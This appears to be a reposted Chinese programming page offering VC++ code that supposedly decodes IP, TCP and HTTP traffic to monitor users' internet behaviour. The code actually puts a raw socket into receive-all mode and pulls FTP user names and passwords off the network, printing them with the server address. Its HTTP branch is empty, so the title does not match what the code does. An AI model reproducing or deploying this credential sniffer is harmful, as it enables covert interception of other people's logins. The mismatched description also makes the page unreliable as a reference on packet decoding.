VC++实现ip数据包解包TCP解包HTTP
来源:互联网 发布:python网络课程 编辑:程序博客网 时间:2024/05/21 07:50
我们需要监控用户的互联网行为,则需要检测HTTP
如何在网络层截取HTTP呢,众所周知,网站是80号端口
代码实现如下
- CInitSock theSock;
-
-
-
- void GetFtp(char *pData, DWORD dwDestIp)
- {
- char szBuf[256];
- static char szUserName[21];
- static char szPassword[21];
-
- if(strnicmp(pData, "USER ", 5) == 0)
- {
- sscanf(pData + 4, "%*[ ]%s", szUserName);
- }
- else if(strnicmp(pData, "PASS ", 5) == 0)
- {
- sscanf(pData + 4, "%*[ ]%s", szPassword);
-
- wsprintf(szBuf, " Server Address: %s; User Name: %s; Password: %s; \n\n",
- ::inet_ntoa(*(in_addr*)&dwDestIp), szUserName, szPassword);
-
- printf(szBuf);
- }
- }
-
-
- void DecodeIPPacket(char *pData)
- {
- IPHeader *pIPHdr = (IPHeader*)pData;
-
-
- int nHeaderLen = (pIPHdr->iphVerLen & 0xf) * sizeof(ULONG);
-
- switch(pIPHdr->ipProtocol)
- {
- case IPPROTO_TCP:
- {
- TCPHeader *pTCPHdr = (TCPHeader *)(pData + nHeaderLen);
- switch(::ntohs(pTCPHdr->destinationPort))
- {
- case 21:
- {
- GetFtp((char*)pTCPHdr + sizeof(TCPHeader), pIPHdr->ipDestination);
- }
- break;
-
- case 80:
- case 8080:
-
- break;
- }
- }
- break;
- case IPPROTO_UDP:
- break;
- case IPPROTO_ICMP:
- break;
- }
- }
-
-
- void main()
- {
-
- SOCKET sRaw = socket(AF_INET, SOCK_RAW, IPPROTO_IP);
-
-
- char szHostName[56];
- SOCKADDR_IN addr_in;
- struct hostent *pHost;
- gethostname(szHostName, 56);
- if((pHost = gethostbyname((char*)szHostName)) == NULL)
- return ;
-
-
- addr_in.sin_family = AF_INET;
- addr_in.sin_port = htons(0);
- memcpy(&addr_in.sin_addr.S_un.S_addr, pHost->h_addr_list[0], pHost->h_length);
-
- printf(" Binding to interface : %s \n", ::inet_ntoa(addr_in.sin_addr));
- if(bind(sRaw, (PSOCKADDR)&addr_in, sizeof(addr_in)) == SOCKET_ERROR)
- return;
-
-
- DWORD dwValue = 1;
- if(ioctlsocket(sRaw, SIO_RCVALL, &dwValue) != 0)
- return ;
-
-
- printf(" \n\n begin to monitor ftp password... \n\n");
- char buff[1024];
- int nRet;
- while(TRUE)
- {
- nRet = recv(sRaw, buff, 1024, 0);
- if(nRet > 0)
- {
- DecodeIPPacket(buff);
- }
- }
- closesocket(sRaw);
- }